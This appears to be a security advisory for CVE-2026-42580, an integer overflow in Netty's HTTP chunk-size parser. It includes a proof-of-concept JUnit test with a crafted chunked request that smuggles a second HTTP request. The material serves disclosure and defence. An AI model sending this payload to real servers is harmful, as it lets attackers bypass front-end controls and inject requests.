CVE-2026-42580

Summary

Netty's chunk size parser silently overflows int, enabling request smuggling attacks.

Details

io.netty.handler.codec.http.HttpObjectDecoder#getChunkSize silently overflows int.

The size is accumulated as follows:

result *= 16; result += digit;

The result is checked only for negative values. However, with a carefully crafted chunk size, the result can be a valid size.

PoC

The test below shows Netty successfully parsing the second request, demonstrating how an attacker can smuggle a second request inside a chunked body.

@Test
public void test() {
    String requestStr = "POST / HTTP/1.1\r\n" +
            "Host: localhost\r\n" +
            "Transfer-Encoding: chunked\r\n\r\n" +
            "100000004\r\n" +
            "test\r\n" +
            "0\r\n" +
            "\r\n" +
            "GET /smuggled HTTP/1.1\r\n" +
            "Host: localhost\r\n" +
            "Content-Length: 0\r\n" +
            "\r\n";

    EmbeddedChannel channel = new EmbeddedChannel(new HttpRequestDecoder());
    assertTrue(channel.writeInbound(Unpooled.copiedBuffer(requestStr, CharsetUtil.US_ASCII)));

    // Request 1
    HttpRequest request = channel.readInbound();
    assertTrue(request.decoderResult().isSuccess());
    HttpContent content = channel.readInbound();
    assertTrue(content.decoderResult().isSuccess());
    assertEquals("test", content.content().toString(CharsetUtil.US_ASCII));
    content.release();
    LastHttpContent last = channel.readInbound();
    assertTrue(last.decoderResult().isSuccess());
    last.release();

    // Request 2
    request = channel.readInbound();
    assertTrue(request.decoderResult().isSuccess());
    last = channel.readInbound();
    assertTrue(last.decoderResult().isSuccess());
    last.release();
}

Impact

HTTP Request Smuggling: Attacker injects arbitrary HTTP requests